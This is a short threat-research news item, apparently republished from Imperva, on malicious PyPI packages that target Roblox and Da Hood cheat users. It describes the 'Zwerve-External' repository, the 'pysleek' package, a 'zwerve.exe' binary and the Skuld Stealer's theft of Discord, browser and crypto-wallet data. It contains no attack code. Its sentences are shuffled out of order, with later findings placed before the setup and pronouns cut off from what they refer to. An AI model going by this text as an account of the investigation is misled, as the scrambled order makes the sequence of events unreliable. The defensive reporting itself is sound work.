In recent research on compromised and malicious PyPI packages, Imperva Threat Research has identified an ongoing malware campaign specifically targeting Roblox hackers. Over time, vast communities have assembled on various platforms such as Reddit, YouTube, and Discord, allowing players to exchange tips and tools on mods and cheats for various game environments. We observed from the history of ‘main.py’ in the ‘Zwerve-External’ Repository, that the maintainer regularly updated the code to use various different malicious PyPi packages. One example of this, Da Hood, is a game within the Roblox framework, which takes place in a gang subculture environment, where players can choose to become a police officer or a criminal, participating in or combating gang activities. Although some of these programs offer legitimate game boosts, malicious actors frequently leverage these game hackers’ interest in modifications to deliver malware. Malicious actors can use popular gaming platforms, forums, and communities to spread viruses and malware such as stealers, RATs, and cryptominers. Game hackers are often encouraged to disable AV and real-time protection in order to allow cheats to run, making them even more susceptible to malware infection, as we will see in our example later. Upon investigation, we discovered that the package downloads a binary file called ‘zwerve.exe’. When we examined the GitHub repository hosting this binary, we noticed that the repository maintainer has been repeatedly adding and removing the binary file every few days. The Skuld Stealer is a Go-written malware targeting Windows systems, designed to extract sensitive data from Discord, browsers, and cryptocurrency wallets. Many gamers, including Roblox (and Da Hood) players, opt to install cheats (‘externals’), hacks, and modifications (‘mods’) to enhance their gaming experience. Mods can change the way a game looks or behaves, whereas cheats may allow the player to gain certain advantages during game play, such as “aimlock”, which enhances accuracy in shooter games. It also targets Discord users by capturing 2FA codes and intercepting login requests, while extracting data from cryptocurrency wallets and replacing clipboard content with malicious crypto addresses. These tools are often created for educational and research purposes, demonstrating how malicious tools can be used to steal secrets and gain remote access to systems. The ‘Zwerve-External’ repository is presented as an open-source cheat tool (external) designed to enhance the gaming experience for Da Hood players. The actions of adding and deleting the binary file “zwerve.exe” from the repository could indicate an attempt to evade detection by static or automated analysis tools. Upon closer examination, we observed that the ‘main.py’ file was being frequently updated with different malicious packages. Roblox is a popular online gaming platform and creation system that allows users to play or create multiplayer games. One such example can be found in the game hacking community surrounding the popular video game Roblox. Eventually, we came across a GitHub repository named ‘Zwerve-External’, that was actively using the ‘pysleek’ malicious package. It has been well documented that the installation of such cheats and mods can leave gamers exposed to malware infection. In this blog, we shed light on this campaign and the evolving tactics cybercriminals use to target game hacking communities. This duality highlights the challenge of balancing open research with the risk of empowering cybercriminals, as tools meant to improve security are often weaponized against unsuspecting users. At this stage, we wanted to investigate whether there were other malicious packages exhibiting the same behavior, and we discovered five more.
This Cyber News was published on www.imperva.com. Publication date: Tue, 01 Oct 2024 00:43:05 +0000